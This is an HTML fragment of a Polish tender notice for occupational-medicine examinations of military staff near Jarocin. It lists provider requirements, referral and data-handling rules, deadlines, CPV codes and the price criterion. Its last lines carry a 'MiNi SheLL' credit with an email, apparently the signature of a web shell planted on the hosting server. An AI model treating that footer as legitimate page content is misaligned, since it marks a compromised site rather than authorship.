<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług medycznych dla pracowników  wojska i żołnierzy zawodowych, w zakresie medycyny pracy (badania profilaktyczne wstępne, okresowe i kontrolne - o których mowa w art. 229 § 1, 2 i 5 kodeksu pracy) i profilaktyki, niezbędnych ze względu na warunki pracy, określonych w przepisach prawa pracy i służbie medycyny oraz zgodnie z istotnymi postanowieniami umowy. 
2.Szczegółowe zestawienie usług medycznych objętych przedmiotem zamówienia znajduje się w formularzu cenowym -  załączniku nr 2A i  2B do SIWZ.
3.Wymagania stawiane Wykonawcy dotyczące przedmiotu zamówienia:
3.1.Wykonawca musi dysponować gabinetem:
a)w odległości nie większej niż 40 km od granic  administracyjnym miejscowości Jarocin dla zadania nr 2. 
(Wyznacznikiem do określenia odległości mogą być np. mapy w oparciu o serwisy stron internetowych www).
3.2.	Wykonawca musi mieć uprawnienia podstawowej jednostki medycyny pracy, określone w art. 2 ust. 2 ustawy z dnia 27 czerwca  1997 roku o służbie medycyny pracy (tekst jednolity Dz. U. z 2004r.  Nr 125, poz. 1317 z późniejszymi zmianami).
3.3.	Usługi zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarski i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późniejszymi zmianami).
3.4.	Wykonawca zobowiązuje się udzielić świadczeń zdrowotnych zgodnie z przepisami ustawy z dnia 5.12.1996 r. o zawodzie lekarza i lekarza dentysty (tj. z dnia 27 września 2011 roku Dz. U. nr 277 poz. 1634 z późniejszymi zmianami) oraz ustawy z dnia 5 lipca 1196 r. o zawodzie pielęgniarki i położnej (tj. z dnia 25 sierpnia 2009 roku Dz. U. nr 151 poz. 1217 z późniejszymi zmianami) z należyta starannością i ze wskazaniem aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami zapobiegania, rozpoznania oraz zasadami etyki zawodowej, respektując prawa pacjenta - badanego.
3.5.	Gabinety, w których będą wykonywane usługi medyczne musza spełniać standardy określone w rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012  poz. 739).
3.6.	Realizacja świadczeń odbywać się będzie wyłącznie na podstawie imiennych skierowań wraz z: numerem PESEL pracownika/żołnierza zawodowego; rodzajem badania profilaktycznego, jakie ma być wykonane; stanowiskiem pracy; czynnikami szkodliwymi lub uciążliwymi występującymi na stanowisku pracy.
3.7.	Skierowania, o którym mowa w pkt. 5.5 ważne są przez okres 30 dni.
3.8.	Do skierowania, o którym mowa w pkt 5.5 dołączony będzie wykaz szczegółowych badań, w którym Wykonawca określi: datę stawienia się pracownika - żołnierza na badania, planowany termin i godzinę przeprowadzenia określonych badań. Formularz - wykaz badań jest załącznikiem do umowy i stanowi jej integralna część.
3.9.	Wykonawca zobowiązuje się do prowadzenia dokumentacji realizowanych usług medycznych i przekazywania zamawiającemu wykazu zawierającego imię i nazwisko wraz z numerem PESEL oraz rodzajem przeprowadzonego badania. 
3.10.	Zamawiający powierza wykonawcy, na podstawie art. 31 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. z dnia 17 czerwca 2002 roku Dz. U. r. nr 101 poz. 926 z późniejszymi zmianami), dane osób, których przetwarzanie jest możliwe wyłącznie w celu wywiązywania się wykonawcy z obowiązków związanych z udzielanymi świadczeniami.
3.11.	Faktury będą wystawiane po każdym miesiącu świadczenia usługi będącej przedmiotem umowy.
3.12.	Do faktury dołączony będzie wykaz zawierający: imię i nazwisko z numerem PESEL badanego oraz rodzajem przeprowadzonego badania.
3.13.	Badania będą wykonywane w dniach od poniedziałku do piątku w godz. 08:00 do 15:00.
3.14.	Wykonawca poda do wiadomości osób zainteresowanych, na tablicy ogłoszeń przed siedzibą oraz przekaże na piśmie Zamawiającemu informację o zasadach i terminach przyjęć pacjentów na badania profilaktyczne.
3.15.	W przypadku nieobecności lekarza wykonującego konsultacje specjalistyczne Wykonawca w terminie 3 dni roboczych zobowiązany jest do wyznaczenia zastępstwa (innego lekarza) w swojej placówce, które umożliwi wykonanie świadczenia lub wskaże  Zamawiającemu podwykonawcę, który wykona świadczenie.
3.16.	Termin realizacji badań podstawowych nie może przekroczyć 5 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
3.17.	Termin realizacji badań specjalistycznych (badania kierowców, badania psychologiczne) nie może przekroczyć 10 dni roboczych od momentu zgłoszenia badanego do zakładu świadczenia usług medycznych.
3.18.	Wykonawca zobowiązuje się do zapewnienia wykonywania badań na najwyższym poziomie zarówno pod względem obsługi ze strony personelu medycznego, jak i warunków lokalowych oraz świadczenia usług medycznych nieprzerwanie przez cały okres trwania umowy, tzn. bez przerw urlopowych, chorobowych, itp.
3.19.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
3.20.	Wykonawca akceptuje fakt, iż badania lekarskie podane w formularzu cenowym (załącznik nr 2A i 2B do SIWZ), służą do skalkulowania ceny, porównania oferty i wyboru oferty najkorzystniejszej.
3.21.	Ceny jednostkowe za poszczególne badania, podane przez Wykonawcę w formularzu cenowym - załącznik nr 2A i 2B do SIWZ, nie mogą ulec zmianie przez cały okres obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6, 85.14.50.00-7, 85.15.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com